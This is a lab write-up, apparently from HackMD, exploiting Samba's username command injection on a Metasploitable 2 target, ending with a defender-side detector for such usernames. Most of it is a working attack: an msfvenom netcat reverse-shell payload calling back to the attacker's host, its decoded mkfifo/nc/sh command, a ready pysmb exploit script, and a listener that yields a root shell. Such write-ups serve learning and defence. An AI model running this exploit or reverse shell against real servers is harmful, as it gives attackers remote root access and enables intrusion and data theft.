![_aa2a1bf9-fdc5-4b30-9e07-d1c1b6b388de](https://hackmd.io/_uploads/BJhBIubN6.jpg =600x600)

# No Hang Up + Command Injection on Metasploitable 2

# Recon

Nmap scan:

```bash=
nmap -sV -oA output -v 192.168.136.132

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
```

We will go after the SMB service (Samba smbd on ports 139 and 445).

Tools needed for this task:

**MsfVenom**
**Python**

This is going to be a simple netcat reverse shell.

## Developing the payload

The payload is the command that connects back to our machine, so we need our machine's IP and a port.
This payload will be for Unix.

**msfvenom command**

```bash=
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.136.129 LPORT=777 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 104 bytes
Final size of python file: 526 bytes
buf =  b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f"
buf += b"\x75\x76\x6c\x63\x72\x6d\x68\x3b\x20\x6e\x63\x20"
buf += b"\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e"
buf += b"\x31\x32\x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74"
buf += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x7c"
buf += b"\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74"
buf += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x32"
buf += b"\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70"
buf += b"\x2f\x75\x76\x6c\x63\x72\x6d\x68"
root@kali:~/Documents/CTF/Msf#
```

This is just the raw command written out as hex-escaped bytes. If we decode it with a hex decoder we get the netcat command back.
```bash=
root@kali:~/Documents/CTF/Msf# printf '\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x3b\x20\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e\x31\x32\x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68'
mkfifo /tmp/uvlcrmh; nc 192.168.136.129 777 0</tmp/uvlcrmh | /bin/sh >/tmp/uvlcrmh 2>&1;
```

## Making the Python script

Install the SMB module:

```shell=
pip install pysmb
```

```python=
#!/usr/bin/env python
from smb.SMBConnection import SMBConnection


def get_command_buffer():
    # Raw payload bytes, copied from the msfvenom output above.
    strCommandBuffer = b""
    strCommandBuffer += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f"
    strCommandBuffer += b"\x75\x76\x6c\x63\x72\x6d\x68\x3b\x20\x6e\x63\x20"
    strCommandBuffer += b"\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e"
    strCommandBuffer += b"\x31\x32\x39\x20\x37\x37\x37\x20\x30\x3c\x2f\x74"
    strCommandBuffer += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x7c"
    strCommandBuffer += b"\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74"
    strCommandBuffer += b"\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x32"
    strCommandBuffer += b"\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70"
    strCommandBuffer += b"\x2f\x75\x76\x6c\x63\x72\x6d\x68"
    return strCommandBuffer


def run_exploit():
    strCommandBuffer = get_command_buffer()
    # The decoded command is placed in the username field, wrapped in nohup.
    strEncodedUserId = f"/=`nohup {strCommandBuffer.decode()}`"
    strServerIp = "192.168.136.132"  # <- Add IP of the server
    try:
        # pysmb: SMBConnection(username, password, my_name, remote_name, ...)
        conn = SMBConnection(strEncodedUserId, "", "HELLO", "TEST", use_ntlm_v2=False)
        conn.connect(strServerIp, 445)
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    run_exploit()
```

**SMB and command execution vulnerabilities:** The Server Message Block (SMB) protocol is used for file sharing, printer sharing, and access to remote services on a network. In some older or unpatched systems (like those simulated in Metasploitable), SMB may be vulnerable to remote command execution.
This means an attacker could potentially execute arbitrary commands on the server through the SMB protocol.

**Exploiting nohup in this context:** The nohup command is designed to keep a process running after its controlling terminal is closed, by making it ignore the hangup signal. In an exploit scenario, if an attacker can execute commands via SMB, they might use nohup to ensure that their processes (like a reverse shell) continue running even if the initial connection is disrupted. This gives the attacker a form of persistence.

The script injects a netcat connection back to a listening server.

## Make the listener

The listener uses the same port as the payload:

```shell=
nc -lvnp 777
listening on [any] 777 ...
```

## Run the script

```shell=
python exploit.py
```

## Result

![Skjermbilde 2023-11-15 090954](https://hackmd.io/_uploads/Hk8xpgzE6.png)

Now you are root.

The script will time out, but you will still be inside the system. We could incorporate a while loop in the script to prevent the timeout.

---
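As an added, defender-side example (not part of the original write-up): the vector above is a username that ends up being handed to a shell, so a service front end or a log review can catch it by refusing shell metacharacters in the username field. The block decodes the page's msfvenom buffer and runs that check over constructed session-log lines; the log format, field names and sample hosts are assumptions, not Samba's own output.

```python
import re

# The msfvenom buffer shown earlier on this page (same 104 bytes, reflowed).
PAYLOAD = (
    b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x3b"
    b"\x20\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x36\x2e\x31\x32\x39\x20"
    b"\x37\x37\x37\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72\x6d\x68\x20\x7c"
    b"\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x75\x76\x6c\x63\x72"
    b"\x6d\x68\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x75\x76\x6c"
    b"\x63\x72\x6d\x68"
)

# Shell metacharacters; a bare '$' is skipped because machine accounts (HOST$) carry one.
SHELL_METACHARS = set("`;|&<>\n")
# Shape of the reverse shell on this page: a named pipe wired between nc and sh.
REVERSE_SHELL_RE = re.compile(r"mkfifo\s+\S+.*\bnc\b.*/bin/sh")
USER_FIELD_RE = re.compile(r"user=\[(.*?)\] host=(\S+)")


def decode_payload(buf: bytes) -> str:
    """Turn the msfvenom byte buffer back into the shell command it encodes."""
    return buf.decode("ascii")


def inspect_username(name: str) -> dict:
    """Classify one SMB username as a plain account name or an injection attempt."""
    found = sorted(c for c in SHELL_METACHARS if c in name)
    return {
        "metachars": found,
        "reverse_shell": bool(REVERSE_SHELL_RE.search(name)),
        "nohup": "nohup" in name,
        "suspicious": bool(found),
    }


def scan_session_log(text: str) -> list:
    """Return (host, username, verdict) for every logon whose username is suspicious."""
    hits = []
    for line in text.splitlines():
        m = USER_FIELD_RE.search(line)
        verdict = inspect_username(m.group(1)) if m else None
        if verdict and verdict["suspicious"]:
            hits.append((m.group(2), m.group(1), verdict))
    return hits


# Constructed sample lines (the format is invented for this example, not Samba's):
# a normal user, the page's payload in the username field, and a machine account.
SAMPLE_LOG = "\n".join([
    "2023-11-15 09:09:54 session setup user=[alice] host=192.0.2.10",
    "2023-11-15 09:09:55 session setup user=[/=`nohup " + decode_payload(PAYLOAD) + "`] host=192.0.2.20",
    "2023-11-15 09:09:56 session setup user=[WORKSTATION$] host=192.0.2.11",
])
```

Only the second line is reported, with the reverse-shell shape and the nohup marker both set; the machine account with its trailing `$` passes.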